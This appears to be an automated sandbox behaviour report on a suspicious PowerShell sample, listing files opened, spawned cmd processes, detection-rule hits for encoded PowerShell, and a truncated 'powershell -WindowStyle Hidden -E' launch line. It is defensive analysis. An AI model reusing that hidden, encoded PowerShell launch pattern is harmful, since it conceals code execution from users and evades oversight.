Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\MSVCR80.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Users\user

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Users\user\AppData

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Users\user\AppData\Roaming

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Users\user\AppData\Roaming\Microsoft

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: unknown
Process created: Commandline size = 5184

Source: C:\Windows\SysWOW64\cmd.exe
Process created: Commandline size = 5176

Source: C:\Windows\SysWOW64\cmd.exe
Process created: Commandline size = 5165

Source: C:\Windows\SysWOW64\cmd.exe
Process created: Commandline size = 5176

Source: C:\Windows\SysWOW64\cmd.exe
Process created: Commandline size = 5165

Source: 00000003.00000002.888389730.0000000001F80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: 00000003.00000002.888152756.0000000000390000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: 00000003.00000002.888245760.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: 00000003.00000002.888181676.00000000003E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: 00000003.00000002.888226541.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: 00000003.00000002.888319048.0000000000629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: 00000003.00000002.888441908.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTR
Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28

Source: Process Memory Space: powershell.exe PID: 1168, type: MEMORYSTR
Matched rule: SUSP_PS1_JAB_Pattern_Jun22_1 date = 2022-06-10, author = Florian Roth, description = Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable, reference = Internal Research, score =

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Code function: 3_2_003CB2EE NtQuerySystemInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Code function: 3_2_003CB2CC NtQuerySystemInformation

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Source: classification engine
Classification label: mal52.evad.win@5/2@0/0

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Console Write: ........................................(.P.....................8.......H.......................0...............................................

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Console Write: ........................................(.P.....................8.......d.......................0...............X.'.............................

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Console Write: ........................................(.P.....................8.......m.......................0...............X.'.............8.".............

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Console Write: ........................................(.P.....................8.......v.......................0....................... .......8.".............

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Console Write: ........................................(.P.....................8...............................0...............X.'.............................

Source: unknown
Process created: C:\Windows\SysWOW64\cmd.exe cmd /C "cmd.exe /c powershell -WindowStyle Hidden -E "…